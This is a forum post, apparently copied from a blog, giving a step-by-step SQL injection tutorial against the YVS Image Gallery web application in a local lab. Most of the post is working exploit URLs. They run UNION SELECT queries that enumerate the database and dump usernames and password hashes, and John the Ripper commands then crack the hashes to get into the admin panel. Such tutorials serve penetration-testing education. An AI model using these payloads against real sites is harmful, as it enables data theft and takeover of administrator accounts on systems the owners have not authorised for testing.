Welcome, Guest: Register On Nairaland / LOGIN! / Trending / Recent / New
Stats: 3,191,741 members, 7,945,321 topics. Date: Tuesday, 10 September 2024 at 02:32 PM

[video] Yvs Image Gallery –sql Injection Tutorial [/video] - Webmasters - Nairaland

Nairaland Forum / Science/Technology / Webmasters / [video] Yvs Image Gallery –sql Injection Tutorial [/video] (857 Views)

Image Gallery / [Video] Yvs Image Gallery – Sql Injection Tutorial [/Video] / Pls I Still Need Help Embedding Image Gallery Inside Article (2) (3) (4)

(1) (Reply)

[video] Yvs Image Gallery –sql Injection Tutorial [/video] by Slyr0x: 12:50pm On Mar 01, 2012
Brief Overview

YVS Image Gallery is a small database driven gallery created to be implemented within your existing site. Only a first attempt at the system has a long way to go, but it provides you with all the necessary tools to run your own picture gallery, such as uploading of multiple images and creation of thumbnails.

As reported by Corrado Liotta, YVS Image Gallery is vulnerable to SQL Injection. So basically what I did was to exploit this vulnerability.

[flash=500,400]
https://www.youtube.com/watch?v=pJgESf1lZF0[/flash]


Tools

YVS Image Gallery.zip
A virtual machine (Example: VMware Player or Virtual Box)
Firefox – (Can be found in BackTrack 5)
John The Ripper – (Can be found in BackTrack 5)

Commands

//Open on firefox 
http://127.0.0.1/server_path/view_all_albums.php

//Check the column count

http://127.0.0.1/YVS1/view_album.php?album_id=1+order+by+1--

http://127.0.0.1/YVS1/view_album.php?album_id=1+union+select+1--

//Get the version, current user and the database name

http://127.0.0.1/server_path/view_album.php?album_id=-2+UNION+SELECT+concat(0x1e,0x1e,version(),0x1e,user(),0x1e,database(),0x1e,0x20)--

//Get all the tables in the database

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(table_name)+FROM+information_schema.tables+where+table_schema=database()--

//Get all the column names

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+group_concat(column_name)+FROM+information_schema.columns+where+table_schema=database()--

//Get username & password from the table "user"

http://127.0.0.1/server_path/view_album.php?album_id=-1+union+select+concat(username,0x3a,password)+from+user--

//The password is md5 encrypted, so we have to decrypt it
//We save the username:hash in a file and name it "pwd.txt"
//We open up a terminal on our backtrack
//We need to Brute Force the user credentials for the web application using John The Ripper
cd pentest/passwords/john
./john pwd.txt --wordlist=password.txt --format=raw-MD5
//where password.txt is our password wordlist
//John the ripper then cracks the hash and gives us the password
//After which we then login to the YVS Image Gallery admin panel

 #####                          #######
#     #   ##   #    # ######    #     # #    # ###### #####
#        #  #  ##  ## #         #     # #    # #      #    #
#  #### #    # # ## # #####     #     # #    # #####  #    #
#     # ###### #    # #         #     # #    # #      #####
#     # #    # #    # #         #     #  #  #  #      #   #
 #####  #    # #    # ######    #######   ##   ###### #    #



Original Post: http://rotimiakinyele.com/posts/yvs-image-gallery-sql-injection.jsp


- @InfosecShinobi

(1) (Reply)

What Type Of Website Do You Really Want? / I Need Your Help On CSS / How Can I Do This Please?

(Go Up)

Sections: politics (1) business autos (1) jobs (1) career education (1) romance computers phones travel sports fashion health
religion celebs tv-movies music-radio literature webmasters programming techmarket

Links: (1) (2) (3) (4) (5) (6) (7) (8) (9) (10)

Nairaland - Copyright © 2005 - 2024 Oluwaseun Osewa. All rights reserved. See How To Advertise. 10
Disclaimer: Every Nairaland member is solely responsible for anything that he/she posts or uploads on Nairaland.